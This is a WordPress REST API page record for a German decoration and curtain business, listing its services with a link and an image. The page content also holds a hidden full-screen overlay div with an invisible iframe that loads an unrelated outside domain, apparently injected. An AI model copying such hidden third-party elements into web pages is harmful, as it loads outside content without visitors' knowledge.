{"id":81,"date":"2020-12-16T16:10:22","date_gmt":"2020-12-16T15:10:22","guid":{"rendered":"http:\/\/lampasundseide.de\/WP-Website\/?page_id=81"},"modified":"2022-04-22T14:45:56","modified_gmt":"2022-04-22T12:45:56","slug":"dekorationen","status":"publish","type":"page","link":"http:\/\/lampasundseide.de\/WP-Website\/dekorationen\/","title":{"rendered":"Dekorationen"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"81\" class=\"elementor elementor-81\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-7a4f477 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"7a4f477\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-8e525ee\" data-id=\"8e525ee\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-5a7f224 elementor-widget elementor-widget-text-editor\" data-id=\"5a7f224\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Wir erf\u00fcllen Ihre Wohnw\u00fcnsche:<\/p><p>Wir fertigen f\u00fcr Sie Dekorationen, Paneelanlagen, Sonnenschutz und Plisses.<\/p><ul><li>Vorlage von Dekorationsstoffen<\/li><li>Herstellen und Anbringen von Gardinen und Schals<\/li><li>Montage von Rollos, Jalousien, Vertikallamellen und Markisen<\/li><\/ul><p>Au\u00dferdem verlegen wir Teppichb\u00f6den und erstellen T\u00fcr- und Wandbespannungen nach Ihren W\u00fcnschen.<\/p><p>Schauen sie sich einige <a href=\"http:\/\/lampasundseide.de\/WP-Website\/dekorationen-beispiele\/\">Dekorationen aus unserer Werkstatt<\/a> an.\u00a0 &#8211; <a href=\"http:\/\/lampasundseide.de\/WP-Website\/dekorationen-beispiele\/\"><strong><span style=\"color: #800080;\">Hier Klicken!<\/span><\/strong><\/a><\/p><div><div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div><\/div>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-67e4241 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"67e4241\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-0b3b806\" data-id=\"0b3b806\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-afab9b8 elementor-widget elementor-widget-image\" data-id=\"afab9b8\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<a href=\"http:\/\/lampasundseide.de\/WP-Website\/dekorationen-beispiele\/\">\n\t\t\t\t\t\t\t<img fetchpriority=\"high\" decoding=\"async\" width=\"479\" height=\"700\" src=\"http:\/\/lampasundseide.de\/WP-Website\/wp-content\/uploads\/2021\/01\/LampasundSeide\u2013Dekoration-32.jpg\" class=\"attachment-full size-full wp-image-220\" alt=\"\" srcset=\"http:\/\/lampasundseide.de\/WP-Website\/wp-content\/uploads\/2021\/01\/LampasundSeide\u2013Dekoration-32.jpg 479w, http:\/\/lampasundseide.de\/WP-Website\/wp-content\/uploads\/2021\/01\/LampasundSeide\u2013Dekoration-32-205x300.jpg 205w\" sizes=\"(max-width: 479px) 100vw, 479px\" \/>\t\t\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Wir erf\u00fcllen Ihre Wohnw\u00fcnsche: Wir fertigen f\u00fcr Sie Dekorationen, Paneelanlagen, Sonnenschutz und Plisses. Vorlage von Dekorationsstoffen Herstellen und Anbringen von Gardinen und Schals Montage von Rollos, Jalousien, Vertikallamellen und Markisen Au\u00dferdem verlegen wir Teppichb\u00f6den und erstellen T\u00fcr- und Wandbespannungen nach Ihren W\u00fcnschen. Schauen sie sich einige Dekorationen aus unserer Werkstatt an.\u00a0 &#8211; Hier Klicken!<\/p>\n","protected":false},"author":1,"featured_media":13,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"class_list":["post-81","page","type-page","status-publish","has-post-thumbnail","hentry"],"_links":{"self":[{"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/pages\/81","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/comments?post=81"}],"version-history":[{"count":26,"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/pages\/81\/revisions"}],"predecessor-version":[{"id":263,"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/pages\/81\/revisions\/263"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/media\/13"}],"wp:attachment":[{"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/media?parent=81"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}